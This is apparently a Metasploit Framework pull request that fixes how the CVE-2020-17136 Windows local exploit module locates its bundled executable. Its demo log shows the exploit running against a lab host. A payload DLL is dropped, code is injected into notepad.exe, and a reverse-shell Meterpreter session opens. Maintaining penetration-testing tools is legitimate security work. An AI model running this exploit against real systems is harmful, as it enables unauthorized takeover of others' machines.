### PR TITLE
Use an absolute assembly path via File.expand_path() for the CVE-2020-17136 exploit

### DIFF
--- a/modules/exploits/windows/local/cve_2020_17136.rb
+++ b/modules/exploits/windows/local/cve_2020_17136.rb
@@ -162,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::UnexpectedReply, 'Could not transform the junction directory into a junction!')
     end
 
-    exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'
+    exe_path = ::File.expand_path(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-17136', 'cloudFilterEOP.exe'))
     unless File.file?(exe_path)
       fail_with(Failure::BadConfig, 'Assembly not found')
     end


### PR DESCRIPTION
The exploit for CVE-2020-17136 uses a relative path from which to load the C# executable. This is not an option that is user-configurable.

Line 165 should be updated from:
`   exe_path = 'data/exploits/CVE-2020-17136/cloudFilterEOP.exe'`
to:
`::File.expand_path(::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-17136', 'cloudFilterEOP.exe'))`

This will correctly use the path of the executable within the exploit data directory regardless of what the current working directory is. To reproduce this issue, run the exploit with Metasploit's current working directory being anything **but** the root of the repository.

This issue was originally reported by @ddouhine in a [comment](https://github.com/rapid7/metasploit-framework/pull/14585#issuecomment-760164360) on the original PR.

Here's a quick demo reproducing the issue where the error is raised when the working directory is not the repository root.

```
msf6 exploit(windows/local/cve_2020_17136) > pwd
[*] exec: pwd

/home/smcintyre/Repositories
msf6 exploit(windows/local/cve_2020_17136) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
[-] Exploit aborted due to failure: bad-config: Assembly not found
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/cve_2020_17136) > cd metasploit-framework
msf6 exploit(windows/local/cve_2020_17136) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
[*] Dropping payload dll at C:\Windows\Temp\MbILKyXQLdTIIeMp.dll and registering it for cleanup...
[*] Running module against DESKTOP-RTCRBEV
[*] Launching notepad.exe to host CLR...
[+] Process 2096 launched.
[*] Reflectively injecting the Host DLL into 2096..
[*] Injecting Host into 2096...
[*] Host injected. Copy assembly into 2096...
[*] Assembly copied.
[*] Executing...
[*] Start reading output
[+] Sync connection key: 2125802844816
[+] Done
[*] End output.
[+] Execution finished.
[*] Sending stage (276038 bytes) to 192.168.159.30
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.30:56363) at 2021-01-14 08:55:59 -0500

meterpreter > 
```